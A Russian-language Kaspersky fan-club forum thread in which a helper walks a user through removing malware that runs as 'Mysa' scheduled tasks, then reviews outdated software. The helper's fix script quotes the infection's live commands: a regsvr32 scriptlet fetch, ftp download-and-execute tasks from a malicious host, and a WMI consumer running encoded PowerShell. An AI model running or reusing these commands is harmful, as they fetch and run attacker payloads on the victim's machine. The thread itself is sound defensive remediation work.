[РЕШЕНО] Как избавиться от процессов Mysa,1,2,3

[Матвей Ульченко]

После проверки TDSSKiller найденные угрозы можно вылечить или поместить на карантин .

На данный момент утилитой  TDSSKiller угроз не обнаружено , но в планировщике заданий всё ещё есть процессы mysa  и ok.

TDSSKiller.3.1.0.28_17.04.2019_22.14.22_log.zip

Изменено 17 апреля, 2019 пользователем Матвей Ульченко

[thyrex]

Теперь сделайте новые логи Farbar

[Матвей Ульченко]

Сделал всё как было написано выше 

Desktop.zip

[thyrex]

1. Выделите следующий код:

Start::
CreateRestorePoint:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.1226bye.xyz:280/v.sct scrobj.dll <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b559f6d7-8635-47d6-9a51-c16c1d11b00d} <==== ATTENTION (Restriction - IP)
CHR HKU\S-1-5-21-855482160-3586351325-2435000415-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [odijcgafkhpobjlnfdgiacpdenpmbgme] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-855482160-3586351325-2435000415-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [phkdcinmmljblpnkohlipaiodlonpinf] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-855482160-3586351325-2435000415-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pmpoaahleccaibbhfjfimigepmfmmbbk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [icanjjkadceebmhanpekkofdhclnoijl] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx
S3 NAVENG; \??\C:\Program Files (x86)\Norton Security\NortonData\22.5.0.124\Definitions\VirusDefs\20160403.034\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security\NortonData\22.5.0.124\Definitions\VirusDefs\20160403.034\EX64.SYS [X]
2019-04-17 22:14 - 2019-04-17 22:14 - 000000080 _____ C:\Windows\system32\s
2019-04-17 22:14 - 2019-04-17 22:14 - 000000078 _____ C:\Windows\system32\ps
2019-04-17 22:14 - 2019-04-17 22:14 - 000000076 _____ C:\Windows\system32\p
2019-04-17 20:56 - 2019-04-17 20:56 - 002969600 _____ C:\Windows\system32\ok.exe
2019-04-17 20:56 - 2019-04-17 20:56 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
2019-04-17 20:56 - 2019-04-17 20:56 - 000037888 _____ (Orgs) C:\Windows\system32\u.exe
2019-04-17 19:55 - 2019-04-17 20:56 - 000023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Drivers\64.exe
2019-04-17 17:55 - 2019-04-17 20:56 - 000003518 _____ C:\Windows\System32\Tasks\Mysa
2019-04-17 17:55 - 2019-04-17 20:56 - 000003504 _____ C:\Windows\System32\Tasks\Mysa3
2019-04-17 17:55 - 2019-04-17 20:56 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2
2019-04-17 17:55 - 2019-04-17 20:56 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2019-04-17 17:55 - 2019-04-17 20:56 - 000003186 _____ C:\Windows\System32\Tasks\ok
2019-04-17 17:54 - 2019-04-17 20:56 - 000023552 _____ (Microsoft Corporation) C:\Windows\system\down.exe
2019-04-17 17:54 - 2019-04-17 20:56 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
2019-03-09 21:14 - 2019-04-17 20:57 - 000008644 _____ C:\Windows\system32\c.txt
2019-03-09 21:14 - 2019-03-11 19:17 - 000354488 _____ C:\Windows\system32\a.txt
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->fuckyoumm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (the data entry has 665 more characters).] <==== ATTENTION
Task: {1F516028-3144-4179-844E-C6C9F55FEA9C} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {748212A3-0611-44A7-B75D-957F1CFE44D1} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {8BD5EF9E-F917-4A60-925F-500F782BAA20} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {C212B0BC-C7BC-400C-85F9-A5ED28E715D0} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Reboot:
End::

2. Скопируйте выделенный текст (правая кнопка мыши – Копировать).

3. Запустите Farbar Recovery Scan Tool.

4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание: будет выполнена перезагрузка компьютера.

[Матвей Ульченко]

Проблема решена , большое спасибо .

Fixlog.zip

[thyrex]

Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе.

• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10);
• Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
• Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
• Процитируйте содержимое файла в своем следующем сообщении.

[Матвей Ульченко]

Извините я не понял последний пункт .

• Процитируйте содержимое файла в своем следующем сообщении

SecurityCheck.zip

[thyrex]

------------------------------- [ Windows ] -------------------------------

Internet Explorer 11.0.9600.18537 Внимание! Скачать обновления

^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^

------------------------------- [ HotFix ] --------------------------------

HotFix KB3125574 Внимание! Скачать обновления

HotFix KB4012212 Внимание! Скачать обновления

HotFix KB4493472 Внимание! Скачать обновления

---------------------- [ AntiVirusFirewallInstall ] -----------------------

Malwarebytes Anti-Malware, версия 2.2.1.1043 v.2.2.1.1043 Внимание! Скачать обновления

-------------------------- [ SecurityUtilities ] --------------------------

Malwarebytes Anti-Malware, версия 2.2.1.1043 v.2.2.1.1043

--------------------------- [ OtherUtilities ] ----------------------------

WinRAR 5.30 (64-разрядная) v.5.30.0 Внимание! Скачать обновления

Microsoft .NET Framework 4.6.2 v.4.6.01590 Внимание! Скачать обновления

Microsoft Silverlight v.5.1.50709.0 Внимание! Скачать обновления

NVIDIA GeForce Experience 3.11.0.73 v.3.11.0.73 Внимание! Скачать обновления

--------------------------------- [ IM ] ----------------------------------

Skype™ 7.32 v.7.32.104 Внимание! Скачать обновления

-------------------------------- [ Java ] ---------------------------------

Java 8 Update 102 (64-bit) v.8.0.1020.14 Внимание! Скачать обновления

^Удалите старую версию и установите новую (jre-8u211-windows-x64.exe)^

Java 8 Update 102 v.8.0.1020.14 Внимание! Скачать обновления

^Удалите старую версию и установите новую (jre-8u211-windows-i586.exe)^

--------------------------- [ AdobeProduction ] ---------------------------

Adobe Shockwave Player 12.2 v.12.2.5.195 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее.

---------------------------- [ UnwantedApps ] -----------------------------

Unity Web Player v.5.3.5f1 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.

 

выполните рекомендованное, и на этом закончим.

[thyrex]

Мы были рады Вам помочь!
Надеемся, что Вы остались довольны результатом.
На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить компьютерные технологии, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно!
Форумчане ежегодно путешествуют. В числе приглашенных в Турцию, Армению, Сочи, Камбоджу можете стать и Вы!
Будем рады видеть Вас в наших рядах!
Всегда ваш, фан-клуб "Лаборатории Касперского".